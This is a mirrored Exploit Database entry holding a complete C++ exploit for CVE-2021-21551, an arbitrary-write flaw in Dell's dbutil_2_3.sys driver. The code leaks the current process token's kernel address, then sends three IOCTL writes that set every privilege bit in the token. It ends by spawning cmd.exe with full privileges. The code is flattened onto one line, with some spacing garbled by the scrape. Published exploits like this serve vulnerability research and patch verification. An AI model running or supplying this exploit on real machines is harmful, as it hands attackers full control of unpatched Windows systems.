DELL dbutil_2_3.sys 2.3 – Arbitrary Write to Local Privilege Escalation (LPE)

• Exploit Database
• 111 阅读

• 作者： Paolo Stagno
  日期： 2021-05-21
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/49893/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220

  # Exploit Title: DELL dbutil_2_3.sys 2.3 - Arbitrary Write to Local Privilege Escalation (LPE) # Date: 10/05/2021 # Exploit Author: Paolo Stagno aka VoidSec # Version: <= 2.3 # CVE: CVE-2021-21551 # Tested on: Windows 10 Pro x64 v.1903 Build 18362.30 # Blog: https://voidsec.com/reverse-engineering-and-exploiting-dell-cve-2021-21551/   #include <iostream> #include <windows.h> #include <winternl.h> #include <tlhelp32.h> #include <algorithm>   #define IOCTL_CODE 0x9B0C1EC8 // IOCTL_CODE value, used to reach the vulnerable function (taken from IDA) #define SystemHandleInformation 0x10 #define SystemHandleInformationSize 1024 * 1024 * 2   // define the buffer structure which will be sent to the vulnerable driver typedef struct Exploit { uint64_tField1; // "padding" can be anything void* Field2; // where to write uint64_tField3; // must be 0 uint64_tField4; // value to write };   typedef struct outBuffer { uint64_tField1; uint64_t Field2; uint64_tField3; uint64_tField4; };   // define a pointer to the native function &apos;NtQuerySystemInformation&apos; using pNtQuerySystemInformation = NTSTATUS(WINAPI*)( ULONG SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);   // define the SYSTEM_HANDLE_TABLE_ENTRY_INFO structure typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO { USHORT UniqueProcessId; USHORT CreatorBackTraceIndex; UCHAR ObjectTypeIndex; UCHAR HandleAttributes; USHORT HandleValue; PVOID Object; ULONG GrantedAccess; } SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO;   // define the SYSTEM_HANDLE_INFORMATION structure typedef struct _SYSTEM_HANDLE_INFORMATION { ULONG NumberOfHandles; SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1]; } SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;   int main(int argc, char** argv) {   // open a handle to the device exposed by the driver - symlink is \\.\\DBUtil_2_3 HANDLE device = ::CreateFileW( L"\\\\.\\DBUtil_2_3", GENERIC_WRITE | GENERIC_READ, NULL, nullptr, OPEN_EXISTING, NULL, NULL); if (device == INVALID_HANDLE_VALUE) { std::cout << "[!] Couldn&apos;t open handle to DBUtil_2_3 driver. Error code: " << ::GetLastError() << std::endl; return -1; } std::cout << "[+] Opened a handle to DBUtil_2_3 driver!\n";   // resolve the address of NtQuerySystemInformation and assign it to a function pointer pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)::GetProcAddress(::LoadLibraryW(L"ntdll"), "NtQuerySystemInformation"); if (!NtQuerySystemInformation) { std::cout << "[!] Couldn&apos;t resolve NtQuerySystemInformation API. Error code: " << ::GetLastError() << std::endl; return -1; } std::cout << "[+] Resolved NtQuerySystemInformation!\n";   // open the current process token - it will be used to retrieve its kernelspace address later HANDLE currentProcess = ::GetCurrentProcess(); HANDLE currentToken = NULL; bool success = ::OpenProcessToken(currentProcess, TOKEN_ALL_ACCESS, &currentToken); if (!success) { std::cout << "[!] Couldn&apos;t open handle to the current process token. Error code: " << ::GetLastError() << std::endl; return -1; } std::cout << "[+] Opened a handle to the current process token!\n";   // allocate space in the heap for the handle table information which will be filled by the call to &apos;NtQuerySystemInformation&apos; API PSYSTEM_HANDLE_INFORMATION handleTableInformation = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(::GetProcessHeap(), HEAP_ZERO_MEMORY, SystemHandleInformationSize);   // call NtQuerySystemInformation and fill the handleTableInformation structure ULONG returnLength = 0; NtQuerySystemInformation(SystemHandleInformation, handleTableInformation, SystemHandleInformationSize, &returnLength);   uint64_t tokenAddress = 0; // iterate over the system&apos;s handle table and look for the handles beloging to our process for (int i = 0; i < handleTableInformation->NumberOfHandles; i++) { SYSTEM_HANDLE_TABLE_ENTRY_INFO handleInfo = (SYSTEM_HANDLE_TABLE_ENTRY_INFO)handleTableInformation->Handles[i]; // if it finds our process and the handle matches the current token handle we already opened, print it if (handleInfo.UniqueProcessId == ::GetCurrentProcessId() && handleInfo.HandleValue == (USHORT)currentToken) { tokenAddress = (uint64_t)handleInfo.Object; std::cout << "[+] Current token address in kernelspace is at: 0x" << std::hex << tokenAddress << std::endl; } }   outBuffer buffer = { 0, 0, 0, 0 };   /* dt nt!_SEP_TOKEN_PRIVILEGES +0x000 Present: Uint8B +0x008 Enabled: Uint8B +0x010 EnabledByDefault : Uint8B   We&apos;ve added +1 to the offsets to ensure that the low bytes part are 0xff. */   // overwrite the _SEP_TOKEN_PRIVILEGES"Present" field in the current process token Exploit exploit = { 0x4141414142424242, (void*)(tokenAddress + 0x40), 0x0000000000000000, 0xffffffffffffffff };   // overwrite the _SEP_TOKEN_PRIVILEGES"Enabled" field in the current process token Exploit exploit2 = { 0x4141414142424242, (void*)(tokenAddress + 0x48), 0x0000000000000000, 0xffffffffffffffff };   // overwrite the _SEP_TOKEN_PRIVILEGES"EnabledByDefault" field in the current process token Exploit exploit3 = { 0x4141414142424242, (void*)(tokenAddress + 0x50), 0x0000000000000000, 0xffffffffffffffff };   DWORD bytesReturned = 0; success = DeviceIoControl( device, IOCTL_CODE, &exploit, sizeof(exploit), &buffer, sizeof(buffer), &bytesReturned, nullptr); if (!success) { std::cout << "[!] Couldn&apos;t overwrite current token &apos;Present&apos; field. Error code: " << ::GetLastError() << std::endl; return -1; } std::cout << "[+] Successfully overwritten current token &apos;Present&apos; field!\n";   success = DeviceIoControl( device, IOCTL_CODE, &exploit2, sizeof(exploit2), &buffer, sizeof(buffer), &bytesReturned, nullptr); if (!success) { std::cout << "[!] Couldn&apos;t overwrite current token &apos;Enabled&apos; field. Error code: " << ::GetLastError() << std::endl; return -1; } std::cout << "[+] Successfully overwritten current token &apos;Enabled&apos; field!\n";   success = DeviceIoControl( device, IOCTL_CODE, &exploit3, sizeof(exploit3), &buffer, sizeof(buffer), &bytesReturned, nullptr); if (!success) { std::cout << "[!] Couldn&apos;t overwrite current token &apos;EnabledByDefault&apos; field. Error code:" << ::GetLastError() << std::endl; return -1; } std::cout << "[+] Successfully overwritten current token &apos;EnabledByDefault&apos; field!\n"; std::cout << "[+] Token privileges successfully overwritten!\n"; std::cout << "[+] Spawning a new shell with full privileges!\n";   system("cmd.exe");   return 0; }